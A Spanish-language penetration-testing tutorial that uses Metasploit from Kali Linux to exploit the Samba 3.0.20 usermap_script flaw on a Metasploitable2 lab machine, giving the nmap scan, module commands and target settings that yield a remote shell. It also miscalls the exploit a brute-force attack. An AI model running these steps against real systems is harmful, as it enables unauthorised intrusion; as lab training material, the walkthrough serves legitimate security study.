Seguridad

Hackear un servidor Samba con Metasploit - Exploit sobre Metasploitable

En esta demostración se usa Kali Linux como atacante y Metasploitable2 como víctima, para explotar el servidor Samba de los puertos 445/139 con Metasploit.

· 4 min de lectura · nivel intermedio · en Samba 3.0.20

En esta demostración se utilizará el sistema Kali-Linux como atacante y el sistema Metasploitable2 como víctima.

Se atacará el servidor Samba, que funciona por defecto en los puertos 445/139.

Ante todo, es posible realizar un escaneo del objetivo con nmap -sV para encontrar los puertos y servicios abiertos en la red.

nmap -sV 192.168.133.128
Illustration 1 — Hacker un serveur Samba avec metasploit - Exploit sur Metasploitable

El framework Metasploit se utiliza por sus numerosos exploits. Para ello hay que abrir un nuevo terminal en el sistema atacante y ejecutar el comando msfconsole.

msfconsole
Illustration 2 — Hacker un serveur Samba avec metasploit - Exploit sur Metasploitable

En primer lugar puede resultar interesante abrir un módulo auxiliar para efectuar un escaneo que identifique la versión de Samba utilizada. Para ello hay que utilizar el comando use e indicar la ruta module auxiliary/scanner/smb/smb_version que se usará para efectuar el escaneo.

use auxiliary/scanner/smb/smb_version

Ahora que el módulo está cargado, las opciones pueden consultarse con el comando show options y deberán definirse a continuación.

show options
Illustration 3 — Hacker un serveur Samba avec metasploit - Exploit sur Metasploitable

La opción RHOSTS debe definirse, ya que la columna Required indica yes y la columna Current Setting está actualmente vacía.

Para definir una opción hay que utilizar el comando set seguido del nombre de la opción RHOSTS y luego de su valor 192.168.133.128, la dirección IP de nuestro objetivo. (IP a adaptar)

set RHOSTS 192.168.133.128

El comando run se utiliza para lanzar el módulo seleccionado.

run
Illustration 4 — Hacker un serveur Samba avec metasploit - Exploit sur Metasploitable

Este escaneo recupera la versión utilizada por SAMBA y no hace nada perjudicial. La versión de Samba detectada es aparentemente la 3.0.20.

Tras una breve búsqueda en Google, resulta que la versión 3.0.20 contiene un exploit publicado en primera página por rapid7, la misma empresa que desarrolla Metasploit.

Illustration 5 — Hacker un serveur Samba avec metasploit - Exploit sur Metasploitable

Al acceder a el enlace, la ruta del exploit que se debe utilizar así como las opciones disponibles aparecen muy rápidamente en la parte superior de la página.

Para llevar a cabo nuestro ataque habrá que utilizar otro módulo accesible por la ruta exploit/multi/samba/usermap_script que se indicará con el comando use.

use exploit/multi/samba/usermap_script

Como con el módulo anterior, siempre conviene consultar las opciones.

show options
Illustration 6 — Hacker un serveur Samba avec metasploit - Exploit sur Metasploitable

La dirección IP del objetivo remoto RHOSTS debe introducirse de nuevo.

set RHOSTS 192.168.133.128

Para lanzar el ataque por fuerza bruta hay que utilizar de nuevo el comando run.

run
Illustration 7 — Hacker un serveur Samba avec metasploit - Exploit sur Metasploitable

Se ha establecido correctamente una sesión de shell con el servidor objetivo, lo que permite ejecutar comandos desde ese servidor. Ejecutando algunos comandos como whoami, pwd, ls -al, etc., es posible tomar conciencia muy rápidamente del entorno.


Hay otras páginas disponibles para aprender más sobre las pruebas de intrusión.